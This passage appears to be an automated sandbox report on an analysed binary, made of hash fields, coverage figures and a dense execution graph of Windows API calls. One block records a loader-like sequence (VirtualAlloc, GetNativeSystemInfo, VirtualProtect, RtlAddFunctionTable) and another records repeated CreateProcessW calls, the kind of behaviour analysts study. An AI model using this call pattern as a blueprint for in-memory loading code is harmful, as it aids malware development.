                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5049b264380f6e879b924361c5edfe4969b88ee32178307ad302894aee6be804
                                                                                                                                            • Instruction ID: ab1f35f596ae11dc9d886a7d31c9996d32d02b4ca8ca3e2ced83069f11e924fb
                                                                                                                                            • Opcode Fuzzy Hash: 5049b264380f6e879b924361c5edfe4969b88ee32178307ad302894aee6be804
                                                                                                                                            • Instruction Fuzzy Hash: 1C014C7140E3C09ED7128A259894B52BFA8EF43224F0981DBD9848B2A3C2699848C7B2
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:8%
                                                                                                                                            Dynamic/Decrypted Code Coverage:2.6%
                                                                                                                                            Signature Coverage:10.1%
                                                                                                                                            Total number of Nodes:1906
                                                                                                                                            Total number of Limit Nodes:45
                                                                                                                                            execution_graph 16668 7ffc65d0465b 16678 7ffc65d0445a __SehTransFilter 16668->16678 16669 7ffc65d047d7 16670 7ffc65d0485b 16669->16670 16701 7ffc65cfcf80 DecodePointer 16669->16701 16672 7ffc65d0466c __SehTransFilter 16672->16669 16687 7ffc65d05bb0 16672->16687 16674 7ffc65d04727 16674->16669 16693 7ffc65cfe500 16674->16693 16678->16672 16680 7ffc65d05180 16678->16680 16681 7ffc65cfe500 __SetUnwindTryBlock 37 API calls 16680->16681 16682 7ffc65d051c1 16681->16682 16683 7ffc65d051f0 __SehTransFilter 16682->16683 16705 7ffc65d05970 16682->16705 16685 7ffc65cfedc0 __SehTransFilter 9 API calls 16683->16685 16686 7ffc65d05259 16685->16686 16686->16678 16688 7ffc65d05bc8 16687->16688 16689 7ffc65d05bc6 16687->16689 16690 7ffc65cfcf80 _inconsistency 36 API calls 16688->16690 16692 7ffc65d05bda __SehTransFilter 16689->16692 16722 7ffc65cfcf50 16689->16722 16690->16689 16692->16674 16754 7ffc65d03b40 16693->16754 16696 7ffc65cfe5c2 RtlLookupFunctionEntry 16697 7ffc65cfe601 16696->16697 16698 7ffc65cfedc0 RtlUnwindEx 16697->16698 16699 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16698->16699 16700 7ffc65cfeee7 16699->16700 16700->16669 16702 7ffc65cfcf9e 16701->16702 16703 7ffc65cfcf50 terminate 35 API calls 16702->16703 16704 7ffc65cfcfa9 16703->16704 16704->16670 16706 7ffc65d05998 16705->16706 16709 7ffc65d055f0 16706->16709 16708 7ffc65d059d3 __SehTransFilter __AdjustPointer 16708->16683 16710 7ffc65d0561e __SehTransFilter 16709->16710 16711 7ffc65d05765 16710->16711 16712 7ffc65d056fa _ValidateRead 16710->16712 16720 7ffc65d056aa __SehTransFilter __AdjustPointer 16710->16720 16714 7ffc65d0577a _ValidateRead 16711->16714 16715 7ffc65d05813 __SehTransFilter 16711->16715 16713 7ffc65cfcf80 _inconsistency 36 API calls 16712->16713 16712->16720 16713->16720 16716 7ffc65cfcf80 _inconsistency 36 API calls 16714->16716 16714->16720 16717 7ffc65d0584d _ValidateRead 16715->16717 16721 7ffc65d058c6 __SehTransFilter _ValidateExecute _ValidateRead 16715->16721 16716->16720 16718 7ffc65cfcf80 _inconsistency 36 API calls 16717->16718 16717->16720 16718->16720 16719 7ffc65cfcf80 _inconsistency 36 API calls 16719->16720 16720->16708 16721->16719 16721->16720 16724 7ffc65cfcf59 16722->16724 16726 7ffc65d039e0 16724->16726 16727 7ffc65d039fa 16726->16727 16736 7ffc65cfd430 DecodePointer 16727->16736 16729 7ffc65d03a09 16730 7ffc65d03a20 16729->16730 16737 7ffc65cfcff0 16729->16737 16732 7ffc65d03a42 16730->16732 16733 7ffc65cfbe50 _invalid_parameter 14 API calls 16730->16733 16749 7ffc65cf7090 16732->16749 16733->16732 16736->16729 16740 7ffc65cfd02a 16737->16740 16738 7ffc65cfd1d8 DecodePointer 16739 7ffc65cfd1e8 16738->16739 16741 7ffc65cfd1f0 16739->16741 16744 7ffc65cf7090 _exit 33 API calls 16739->16744 16745 7ffc65cfd209 16739->16745 16740->16738 16742 7ffc65cfbd70 _invalid_parameter 17 API calls 16740->16742 16741->16730 16743 7ffc65cfd1ce 16742->16743 16743->16738 16743->16741 16744->16745 16747 7ffc65cfd289 16745->16747 16752 7ffc65cf3d00 RtlEncodePointer 16745->16752 16747->16741 16753 7ffc65cf9360 LeaveCriticalSection 16747->16753 16750 7ffc65cf7280 _exit 33 API calls 16749->16750 16751 7ffc65cf70a9 16750->16751 16751->16692 16752->16747 16753->16741 16757 7ffc65d03a60 16754->16757 16758 7ffc65d03a7d 16757->16758 16760 7ffc65d03a7b 16757->16760 16759 7ffc65cfcf80 _inconsistency 36 API calls 16758->16759 16759->16760 16761 7ffc65cfcf80 _inconsistency 36 API calls 16760->16761 16762 7ffc65cfe539 16760->16762 16761->16762 16762->16696 16762->16697 16763 7ffc65cf425a FlsGetValue FlsSetValue 16764 7ffc65cf4283 16763->16764 17440 7ffc65cfe55a 17441 7ffc65cfe564 17440->17441 17442 7ffc65cfe5c2 RtlLookupFunctionEntry 17441->17442 17443 7ffc65cfe601 17441->17443 17442->17443 17805 7ffc65cf405b 17807 7ffc65cf406e 17805->17807 17811 7ffc65cf9360 LeaveCriticalSection 17807->17811 17808 7ffc65cf41bb _updatetlocinfoEx_nolock 17812 7ffc65cf9360 LeaveCriticalSection 17808->17812 17810 7ffc65cf4224 17811->17808 17812->17810 17444 7ffc65d11160 17447 7ffc65d04e90 17444->17447 17446 7ffc65d11179 17448 7ffc65d04ebb 17447->17448 17449 7ffc65d04ecf 17447->17449 17448->17449 17450 7ffc65cfcf50 terminate 35 API calls 17448->17450 17449->17446 17450->17449 17813 7ffc65cfa057 17814 7ffc65cfa061 17813->17814 17815 7ffc65cfa234 17814->17815 17821 7ffc65cfa08e __initmbctable 17814->17821 17816 7ffc65cfa25d IsValidCodePage 17815->17816 17820 7ffc65cfa22d __initmbctable 17815->17820 17818 7ffc65cfa27b GetCPInfo 17816->17818 17816->17820 17817 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17819 7ffc65cfa470 17817->17819 17818->17820 17824 7ffc65cfa295 __initmbctable 17818->17824 17820->17817 17822 7ffc65cfa5e0 __initmbctable 19 API calls 17821->17822 17822->17820 17823 7ffc65cfa5e0 __initmbctable 19 API calls 17823->17820 17824->17823 18414 7ffc65cf5357 18417 7ffc65cf9360 LeaveCriticalSection 18414->18417 18416 7ffc65cf5361 18417->18416 17825 7ffc65cf5854 17826 7ffc65cf585b _calloc_dbg_impl 17825->17826 17827 7ffc65cfc020 _free_base 2 API calls 17826->17827 17828 7ffc65cf59d5 17827->17828 18418 180024ee6 18419 180024eea 18418->18419 18420 180024f52 18418->18420 18421 18002506a CreateProcessW 18420->18421 18422 7ffc65d0bb66 18423 7ffc65d0bb78 _CrtMemDumpAllObjectsSince wcsxfrm 18422->18423 18424 7ffc65d0bc46 18423->18424 18426 7ffc65d0b99c 18423->18426 18425 7ffc65cfbd70 _invalid_parameter 17 API calls 18424->18425 18429 7ffc65d0bb0e _LocaleUpdate::~_LocaleUpdate 18425->18429 18427 7ffc65d0cc93 18426->18427 18430 7ffc65d0bada 18426->18430 18428 7ffc65cfbd70 _invalid_parameter 17 API calls 18427->18428 18427->18429 18428->18429 18431 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18429->18431 18433 7ffc65cfbd70 _invalid_parameter 17 API calls 18430->18433 18432 7ffc65d0cd90 18431->18432 18433->18429 18434 7ffc65cfcb4f 18440 7ffc65cfcb5c 18434->18440 18435 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18436 7ffc65cfcf0f 18435->18436 18437 7ffc65cfcbeb GetStdHandle 18438 7ffc65cfcc94 18437->18438 18441 7ffc65cfcc07 std::exception::_Copy_str 18437->18441 18438->18435 18439 7ffc65cfcc99 18439->18438 18442 7ffc65d01640 17 API calls 18439->18442 18440->18437 18440->18438 18440->18439 18441->18438 18443 7ffc65cfcc73 WriteFile 18441->18443 18444 7ffc65cfcd10 18442->18444 18443->18438 18445 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18444->18445 18446 7ffc65cfcd3d GetModuleFileNameW 18445->18446 18447 7ffc65cfcd68 18446->18447 18448 7ffc65cfcdb1 18446->18448 18449 7ffc65d01640 17 API calls 18447->18449 18451 7ffc65cfce5e 18448->18451 18463 7ffc65d03380 18448->18463 18450 7ffc65cfcd84 18449->18450 18452 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18450->18452 18453 7ffc65d02d80 17 API calls 18451->18453 18452->18448 18454 7ffc65cfce76 18453->18454 18456 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18454->18456 18458 7ffc65cfcea3 18456->18458 18457 7ffc65cfce31 18459 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18457->18459 18460 7ffc65d02d80 17 API calls 18458->18460 18459->18451 18461 7ffc65cfceb9 18460->18461 18462 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 18461->18462 18462->18438 18464 7ffc65d033a6 18463->18464 18465 7ffc65d0342f 18464->18465 18466 7ffc65d033bc _calloc_dbg_impl 18464->18466 18467 7ffc65d0346d _calloc_dbg_impl 18464->18467 18468 7ffc65cfbd70 _invalid_parameter 17 API calls 18465->18468 18466->18457 18467->18466 18469 7ffc65d035fb 18467->18469 18471 7ffc65d03639 _calloc_dbg_impl 18467->18471 18468->18466 18470 7ffc65cfbd70 _invalid_parameter 17 API calls 18469->18470 18470->18466 18471->18466 18472 7ffc65cfbd70 _invalid_parameter 17 API calls 18471->18472 18472->18466 16502 10e0000 16503 10e0183 16502->16503 16504 10e043e VirtualAlloc 16503->16504 16507 10e0462 16504->16507 16505 10e0531 GetNativeSystemInfo 16506 10e056d VirtualAlloc 16505->16506 16509 10e0a7b 16505->16509 16511 10e058b 16506->16511 16507->16505 16507->16509 16508 10e0a00 16508->16509 16510 10e0a56 RtlAddFunctionTable 16508->16510 16510->16509 16511->16508 16512 10e09d9 VirtualProtect 16511->16512 16512->16511 17838 7ffc65cfd04a 17839 7ffc65cfd1d8 DecodePointer 17838->17839 17840 7ffc65cfd1e8 17839->17840 17841 7ffc65cf7090 _exit 33 API calls 17840->17841 17842 7ffc65cfd209 17840->17842 17846 7ffc65cfd1f0 17840->17846 17841->17842 17844 7ffc65cfd289 17842->17844 17847 7ffc65cf3d00 RtlEncodePointer 17842->17847 17844->17846 17848 7ffc65cf9360 LeaveCriticalSection 17844->17848 17847->17844 17848->17846 16513 1800178f4 16516 18000ffc0 16513->16516 16515 180017924 16520 18001000e 16516->16520 16517 180011bd0 16528 1800053b0 16517->16528 16520->16517 16521 1800116b2 16520->16521 16522 18001667c 16520->16522 16521->16515 16525 1800166ac 16522->16525 16526 180016ad3 16525->16526 16532 180023624 16525->16532 16536 18000bc98 16525->16536 16540 1800270c0 16525->16540 16526->16520 16530 1800053e0 16528->16530 16529 18001a10c CreateProcessW 16531 18000598b 16529->16531 16530->16529 16530->16531 16531->16521 16535 180023662 16532->16535 16534 1800237ae 16534->16525 16535->16534 16544 18001a10c 16535->16544 16539 18000bcde 16536->16539 16537 18001a10c CreateProcessW 16538 18000c521 16537->16538 16538->16525 16539->16537 16539->16538 16543 180027157 16540->16543 16541 180027fe1 16541->16525 16542 18001a10c CreateProcessW 16542->16543 16543->16541 16543->16542 16545 18001a166 16544->16545 16546 180024f28 CreateProcessW 16545->16546 16547 18001a335 16546->16547 16547->16534 17455 7ffc65d0e16f 17456 7ffc65d0e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 17455->17456 17457 7ffc65d0eadf 17456->17457 17465 7ffc65d0da75 17456->17465 17478 7ffc65d0eec0 17456->17478 17482 7ffc65d0ef10 17457->17482 17460 7ffc65d0eafd 17461 7ffc65d0eb33 17460->17461 17463 7ffc65d0eec0 25 API calls 17460->17463 17462 7ffc65d0ec29 17461->17462 17476 7ffc65d0eb49 _CrtMemDumpAllObjectsSince 17461->17476 17464 7ffc65d0ef10 25 API calls 17462->17464 17463->17461 17466 7ffc65d0ebda 17464->17466 17467 7ffc65d0eca1 17465->17467 17471 7ffc65d0dbb5 17465->17471 17466->17465 17470 7ffc65d0eec0 25 API calls 17466->17470 17468 7ffc65cfbd70 _invalid_parameter 17 API calls 17467->17468 17472 7ffc65d0dbe9 _LocaleUpdate::~_LocaleUpdate 17467->17472 17468->17472 17469 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17473 7ffc65d0ed9e 17469->17473 17470->17465 17475 7ffc65cfbd70 _invalid_parameter 17 API calls 17471->17475 17472->17469 17475->17472 17476->17466 17486 7ffc65d0f000 17476->17486 17493 7ffc65d0ee40 17476->17493 17479 7ffc65d0eed7 17478->17479 17480 7ffc65d0ef07 17479->17480 17481 7ffc65d0ee40 25 API calls 17479->17481 17480->17457 17481->17479 17485 7ffc65d0ef2c 17482->17485 17483 7ffc65d0ee40 25 API calls 17483->17485 17484 7ffc65d0ef4d 17484->17460 17485->17483 17485->17484 17487 7ffc65d0f026 _CrtMemDumpAllObjectsSince wcsxfrm 17486->17487 17490 7ffc65d0f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 17486->17490 17488 7ffc65d0f276 _CrtMemDumpAllObjectsSince 17487->17488 17487->17490 17491 7ffc65d0f146 _CrtMemDumpAllObjectsSince 17487->17491 17489 7ffc65d0f29d MultiByteToWideChar 17488->17489 17489->17490 17490->17476 17491->17490 17492 7ffc65d0f1b5 MultiByteToWideChar 17491->17492 17492->17490 17494 7ffc65d0ee62 17493->17494 17496 7ffc65d0ee6e 17494->17496 17497 7ffc65d0f360 17494->17497 17496->17476 17498 7ffc65d0f399 17497->17498 17531 7ffc65d0f622 17497->17531 17500 7ffc65d0afb0 _fflush_nolock 17 API calls 17498->17500 17499 7ffc65d0f4f2 17503 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17499->17503 17502 7ffc65d0f3a6 17500->17502 17501 7ffc65d10170 23 API calls 17501->17499 17504 7ffc65d0f3ed 17502->17504 17506 7ffc65d0afb0 _fflush_nolock 17 API calls 17502->17506 17505 7ffc65d0f7c5 17503->17505 17507 7ffc65d0f4c7 17504->17507 17509 7ffc65d0afb0 _fflush_nolock 17 API calls 17504->17509 17505->17496 17508 7ffc65d0f3b8 17506->17508 17507->17499 17532 7ffc65d10170 17507->17532 17508->17504 17512 7ffc65d0afb0 _fflush_nolock 17 API calls 17508->17512 17511 7ffc65d0f43d 17509->17511 17513 7ffc65d0f484 17511->17513 17516 7ffc65d0afb0 _fflush_nolock 17 API calls 17511->17516 17514 7ffc65d0f3ca 17512->17514 17513->17507 17517 7ffc65d0f561 17513->17517 17515 7ffc65d0afb0 _fflush_nolock 17 API calls 17514->17515 17515->17504 17518 7ffc65d0f44f 17516->17518 17519 7ffc65d0afb0 _fflush_nolock 17 API calls 17517->17519 17518->17513 17521 7ffc65d0afb0 _fflush_nolock 17 API calls 17518->17521 17520 7ffc65d0f56e 17519->17520 17522 7ffc65d0f5b8 17520->17522 17524 7ffc65d0afb0 _fflush_nolock 17 API calls 17520->17524 17523 7ffc65d0f461 17521->17523 17527 7ffc65d0b530 wctomb_s 19 API calls 17522->17527 17522->17531 17525 7ffc65d0afb0 _fflush_nolock 17 API calls 17523->17525 17526 7ffc65d0f580 17524->17526 17525->17513 17526->17522 17528 7ffc65d0afb0 _fflush_nolock 17 API calls 17526->17528 17527->17531 17529 7ffc65d0f592 17528->17529 17530 7ffc65d0afb0 _fflush_nolock 17 API calls 17529->17530 17530->17522 17531->17499 17531->17501 17533 7ffc65d10185 17532->17533 17534 7ffc65d0afb0 _fflush_nolock 17 API calls 17533->17534 17535 7ffc65d101c7 17534->17535 17536 7ffc65d101dc 17535->17536 17537 7ffc65d0ab10 17 API calls 17535->17537 17538 7ffc65d10326 17535->17538 17536->17499 17537->17538 17538->17536 17539 7ffc65d09290 23 API calls 17538->17539 17539->17536 18477 7ffc65d11370 18478 7ffc65d0af60 _unlock_file2 2 API calls 18477->18478 18479 7ffc65d11390 18478->18479 16643 7ffc65cf8040 16644 7ffc65cf805b GetModuleFileNameA 16643->16644 16645 7ffc65cf8056 16643->16645 16647 7ffc65cf8083 16644->16647 16646 7ffc65cfaa40 __initmbctable 24 API calls 16645->16646 16646->16644 16769 7ffc65cf7640 GetStartupInfoW 16770 7ffc65cf7676 _calloc_dbg 16769->16770 16778 7ffc65cf7689 16770->16778 16779 7ffc65cf7a19 GetFileType 16770->16779 16780 7ffc65cf7a32 InitializeCriticalSectionAndSpinCount 16770->16780 16781 7ffc65cf7ab9 16770->16781 16771 7ffc65cf7ce0 SetHandleCount 16771->16778 16772 7ffc65cf7b95 GetStdHandle 16773 7ffc65cf7bb9 16772->16773 16774 7ffc65cf7c7b 16772->16774 16773->16774 16775 7ffc65cf7bc8 GetFileType 16773->16775 16774->16771 16775->16774 16776 7ffc65cf7beb InitializeCriticalSectionAndSpinCount 16775->16776 16776->16774 16776->16778 16779->16780 16779->16781 16780->16778 16780->16781 16781->16771 16781->16772 16781->16774 17540 7ffc65cf1140 17541 7ffc65cf116a 17540->17541 17542 7ffc65cf118c 17541->17542 17543 7ffc65cf119a FileTimeToSystemTime 17541->17543 17545 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17542->17545 17543->17542 17544 7ffc65cf11ae 17543->17544 17548 7ffc65cf1000 GetThreadLocale GetDateFormatA 17544->17548 17547 7ffc65cf11d0 17545->17547 17549 7ffc65cf1062 GetThreadLocale GetTimeFormatA 17548->17549 17550 7ffc65cf105b 17548->17550 17549->17550 17550->17542 16782 7ffc65cfae40 16783 7ffc65cfd490 std::exception::_Copy_str 17 API calls 16782->16783 16784 7ffc65cfae59 16783->16784 16785 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16784->16785 16786 7ffc65cfae86 std::exception::_Copy_str 16785->16786 16790 7ffc65cfaf3a std::exception::_Copy_str 16786->16790 16805 7ffc65d00fd0 16786->16805 16788 7ffc65cfaf0d 16789 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16788->16789 16789->16790 16791 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 16790->16791 16792 7ffc65cfb2e0 16790->16792 16791->16792 16793 7ffc65cfb33e 16792->16793 16794 7ffc65cfd490 std::exception::_Copy_str 17 API calls 16792->16794 16815 7ffc65d00cc0 16793->16815 16796 7ffc65cfb311 16794->16796 16798 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16796->16798 16798->16793 16799 7ffc65cfcff0 terminate 34 API calls 16801 7ffc65cfb373 16799->16801 16800 7ffc65cfb37d 16803 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16800->16803 16802 7ffc65cf7090 _exit 33 API calls 16801->16802 16802->16800 16804 7ffc65cfb3a0 16803->16804 16807 7ffc65d00ff0 __SehTransFilter 16805->16807 16808 7ffc65d00ff7 16805->16808 16806 7ffc65d01055 16809 7ffc65cfbd70 _invalid_parameter 17 API calls 16806->16809 16807->16788 16808->16806 16811 7ffc65d01093 _calloc_dbg_impl 16808->16811 16809->16807 16810 7ffc65d0111a 16812 7ffc65cfbd70 _invalid_parameter 17 API calls 16810->16812 16811->16807 16811->16810 16813 7ffc65d01158 16811->16813 16812->16807 16813->16807 16814 7ffc65cfbd70 _invalid_parameter 17 API calls 16813->16814 16814->16807 16833 7ffc65cf3d00 RtlEncodePointer 16815->16833 16817 7ffc65d00cf6 16818 7ffc65d00e15 16817->16818 16819 7ffc65d00d23 LoadLibraryW 16817->16819 16822 7ffc65d00e39 DecodePointer DecodePointer 16818->16822 16831 7ffc65d00e68 16818->16831 16820 7ffc65d00d44 GetProcAddress 16819->16820 16830 7ffc65d00d3d 16819->16830 16821 7ffc65d00d6a 7 API calls 16820->16821 16820->16830 16821->16818 16826 7ffc65d00df3 GetProcAddress EncodePointer 16821->16826 16822->16831 16823 7ffc65d00f60 DecodePointer 16823->16830 16824 7ffc65d00f0d 16824->16823 16829 7ffc65d00f2f DecodePointer 16824->16829 16825 7ffc65d00eed DecodePointer 16825->16824 16826->16818 16827 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16828 7ffc65cfb358 16827->16828 16828->16799 16828->16800 16829->16823 16832 7ffc65d00ec8 16829->16832 16830->16827 16831->16824 16831->16825 16831->16832 16832->16823 16833->16817 16834 7ffc65cf9240 16835 7ffc65cf925f 16834->16835 16836 7ffc65cf924d 16834->16836 16837 7ffc65cf9281 InitializeCriticalSectionAndSpinCount 16835->16837 16838 7ffc65cf9295 16835->16838 16837->16838 16840 7ffc65cf9360 LeaveCriticalSection 16838->16840 16840->16836 17849 7ffc65cf443c 17850 7ffc65cf444c 17849->17850 17853 7ffc65cf9360 LeaveCriticalSection 17850->17853 17852 7ffc65cf48be 17853->17852 17551 7ffc65d0f53e 17552 7ffc65d0f55c 17551->17552 17553 7ffc65d0f74d 17552->17553 17554 7ffc65d10170 23 API calls 17552->17554 17555 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17553->17555 17554->17553 17556 7ffc65d0f7c5 17555->17556 16841 7ffc65d10e40 16842 7ffc65d10e50 16841->16842 16844 7ffc65d10e5e 16841->16844 16843 7ffc65cf3e00 3 API calls 16842->16843 16842->16844 16843->16844 17854 7ffc65d11040 17857 7ffc65cfe8f0 17854->17857 17856 7ffc65d1108f 17858 7ffc65cfe90d 17857->17858 17861 7ffc65d03cc0 17858->17861 17860 7ffc65cfe980 17860->17856 17862 7ffc65d03cdd 17861->17862 17864 7ffc65d03d82 17862->17864 17867 7ffc65d03ef3 __SehTransFilter 17862->17867 17872 7ffc65d03d62 17862->17872 17866 7ffc65d03dc8 17864->17866 17870 7ffc65d03e40 17864->17870 17864->17872 17865 7ffc65d03ebd 17868 7ffc65cfe790 __SehTransFilter 37 API calls 17865->17868 17865->17872 17869 7ffc65d03a60 __StateFromControlPc 36 API calls 17866->17869 17867->17872 17879 7ffc65d040b0 17867->17879 17868->17872 17871 7ffc65d03dec 17869->17871 17870->17865 17873 7ffc65d03e93 17870->17873 17874 7ffc65cfcf80 _inconsistency 36 API calls 17870->17874 17875 7ffc65d03e08 17871->17875 17876 7ffc65cfcf80 _inconsistency 36 API calls 17871->17876 17872->17860 17877 7ffc65d04f20 __SehTransFilter 36 API calls 17873->17877 17874->17873 17878 7ffc65d04f20 __SehTransFilter 36 API calls 17875->17878 17876->17875 17877->17865 17878->17872 17880 7ffc65d03b40 __StateFromControlPc 36 API calls 17879->17880 17881 7ffc65d040ea 17880->17881 17882 7ffc65cfe500 __SetUnwindTryBlock 37 API calls 17881->17882 17883 7ffc65d04110 17882->17883 17924 7ffc65d03c70 17883->17924 17886 7ffc65d04176 17888 7ffc65d03c70 __GetUnwindTryBlock 37 API calls 17886->17888 17887 7ffc65d04133 __SetState 17927 7ffc65d03c00 17887->17927 17889 7ffc65d04174 17888->17889 17891 7ffc65cfcf80 _inconsistency 36 API calls 17889->17891 17906 7ffc65d041af _ValidateRead _SetThrowImageBase 17889->17906 17891->17906 17892 7ffc65d047d9 17895 7ffc65d04847 17892->17895 17896 7ffc65d047f3 17892->17896 17900 7ffc65d047d7 17892->17900 17893 7ffc65d043f5 17903 7ffc65d0466c __SehTransFilter 17893->17903 17936 7ffc65cfea30 17893->17936 17894 7ffc65d04347 17894->17892 17894->17893 17898 7ffc65cfcf50 terminate 35 API calls 17895->17898 17941 7ffc65d04960 17896->17941 17898->17900 17899 7ffc65d04235 17899->17872 17900->17899 17902 7ffc65cfcf80 _inconsistency 36 API calls 17900->17902 17902->17899 17903->17900 17904 7ffc65d05bb0 __SehTransFilter 36 API calls 17903->17904 17905 7ffc65d04727 17904->17905 17905->17900 17907 7ffc65cfe500 __SetUnwindTryBlock 37 API calls 17905->17907 17906->17894 17906->17899 17908 7ffc65cfcf80 _inconsistency 36 API calls 17906->17908 17911 7ffc65d0428e 17906->17911 17909 7ffc65d04767 17907->17909 17908->17911 17910 7ffc65cfedc0 __SehTransFilter 9 API calls 17909->17910 17910->17900 17912 7ffc65cfcf80 _inconsistency 36 API calls 17911->17912 17913 7ffc65d042fa 17911->17913 17912->17913 17913->17894 17915 7ffc65d05bb0 __SehTransFilter 36 API calls 17913->17915 17914 7ffc65d04450 __SehTransFilter 17914->17903 17916 7ffc65d05180 __SehTransFilter 38 API calls 17914->17916 17917 7ffc65d04340 __SehTransFilter 17915->17917 17916->17914 17917->17894 17918 7ffc65d0435a __SehTransFilter 17917->17918 17919 7ffc65d04393 17917->17919 17930 7ffc65d04870 17918->17930 17920 7ffc65cfcf50 terminate 35 API calls 17919->17920 17920->17894 17925 7ffc65cfe500 __SetUnwindTryBlock 37 API calls 17924->17925 17926 7ffc65d03c9c 17925->17926 17926->17886 17926->17887 17928 7ffc65cfe500 __SetUnwindTryBlock 37 API calls 17927->17928 17929 7ffc65d03c31 17928->17929 17929->17889 17951 7ffc65d0d4e0 17930->17951 17933 7ffc65d0d320 17935 7ffc65d0d375 17933->17935 17934 7ffc65d0d3ba RaiseException 17934->17894 17935->17934 17937 7ffc65d03b40 __StateFromControlPc 36 API calls 17936->17937 17938 7ffc65cfea6f 17937->17938 17939 7ffc65cfcf80 _inconsistency 36 API calls 17938->17939 17940 7ffc65cfea7a 17938->17940 17939->17940 17940->17914 17943 7ffc65d04990 17941->17943 17948 7ffc65d0498b 17941->17948 17942 7ffc65d049b2 __SehTransFilter 17944 7ffc65d04a41 17942->17944 17945 7ffc65cfcf80 _inconsistency 36 API calls 17942->17945 17942->17948 17943->17942 17954 7ffc65cf3d00 RtlEncodePointer 17943->17954 17946 7ffc65cfea30 __SehTransFilter 36 API calls 17944->17946 17945->17944 17949 7ffc65d04a8e __SehTransFilter 17946->17949 17948->17900 17949->17948 17950 7ffc65d05180 __SehTransFilter 38 API calls 17949->17950 17950->17948 17952 7ffc65d0d660 std::exception::_Copy_str 17 API calls 17951->17952 17953 7ffc65d0437d 17952->17953 17953->17933 17954->17942 17955 7ffc65d0dc41 17956 7ffc65d0ee40 25 API calls 17955->17956 17957 7ffc65d0da75 17956->17957 17958 7ffc65d0eca1 17957->17958 17961 7ffc65d0dbb5 17957->17961 17959 7ffc65cfbd70 _invalid_parameter 17 API calls 17958->17959 17962 7ffc65d0dbe9 _LocaleUpdate::~_LocaleUpdate 17958->17962 17959->17962 17960 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17963 7ffc65d0ed9e 17960->17963 17964 7ffc65cfbd70 _invalid_parameter 17 API calls 17961->17964 17962->17960 17964->17962 16282 18001a10c 16283 18001a166 16282->16283 16286 180024f28 16283->16286 16285 18001a335 16287 180024fcb 16286->16287 16288 18002506a CreateProcessW 16287->16288 16288->16285 16326 7ffc65cf3471 16327 7ffc65cf347a 16326->16327 16328 7ffc65cf34bc 16326->16328 16329 7ffc65cf3496 16327->16329 16339 7ffc65cf70b0 16327->16339 16331 7ffc65cf7d00 _ioterm DeleteCriticalSection 16329->16331 16332 7ffc65cf349b 16331->16332 16333 7ffc65cf3e00 3 API calls 16332->16333 16334 7ffc65cf34a0 16333->16334 16338 7ffc65cf88d0 HeapDestroy 16334->16338 16336 7ffc65cf34a5 16336->16328 16337 7ffc65cf3e00 3 API calls 16336->16337 16337->16328 16338->16336 16342 7ffc65cf7280 16339->16342 16343 7ffc65cf7296 _exit 16342->16343 16344 7ffc65cf744e 16343->16344 16345 7ffc65cf72c7 DecodePointer 16343->16345 16352 7ffc65cf7368 _initterm 16343->16352 16346 7ffc65cf745e 16344->16346 16386 7ffc65cf7520 16344->16386 16347 7ffc65cf72e5 DecodePointer 16345->16347 16345->16352 16349 7ffc65cf70c3 16346->16349 16350 7ffc65cf7520 _exit LeaveCriticalSection 16346->16350 16361 7ffc65cf7314 16347->16361 16349->16329 16351 7ffc65cf7479 16350->16351 16389 7ffc65cf74e0 16351->16389 16352->16344 16366 7ffc65cf6210 16352->16366 16357 7ffc65cf736d DecodePointer 16365 7ffc65cf3d00 RtlEncodePointer 16357->16365 16360 7ffc65cf7449 16379 7ffc65cf6f10 16360->16379 16361->16352 16361->16357 16363 7ffc65cf7391 DecodePointer DecodePointer 16361->16363 16364 7ffc65cf3d00 RtlEncodePointer 16361->16364 16363->16361 16364->16361 16365->16361 16368 7ffc65cf6229 16366->16368 16367 7ffc65cf628f 16392 7ffc65cfbd70 DecodePointer 16367->16392 16368->16367 16370 7ffc65cf62cb 16368->16370 16396 7ffc65cf9360 LeaveCriticalSection 16370->16396 16372 7ffc65cf62c3 16372->16344 16373 7ffc65cf7100 16372->16373 16374 7ffc65cf7112 16373->16374 16375 7ffc65cf71e4 DecodePointer 16374->16375 16376 7ffc65cf71fe 16375->16376 16421 7ffc65cf3d00 RtlEncodePointer 16376->16421 16378 7ffc65cf7219 16378->16360 16422 7ffc65cf63e0 16379->16422 16381 7ffc65cf6f8e 16384 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16381->16384 16382 7ffc65cf6f33 16382->16381 16430 7ffc65cf6660 16382->16430 16385 7ffc65cf6fa7 16384->16385 16385->16344 16498 7ffc65cf9360 LeaveCriticalSection 16386->16498 16388 7ffc65cf752e 16388->16346 16499 7ffc65cf7490 GetModuleHandleW 16389->16499 16393 7ffc65cfbdd0 16392->16393 16394 7ffc65cfbdac 16392->16394 16397 7ffc65cfbe00 16393->16397 16394->16372 16396->16372 16400 7ffc65cfbe50 16397->16400 16401 7ffc65cfbe81 _invalid_parameter 16400->16401 16402 7ffc65cfbe8d RtlCaptureContext RtlLookupFunctionEntry 16400->16402 16401->16402 16403 7ffc65cfbf64 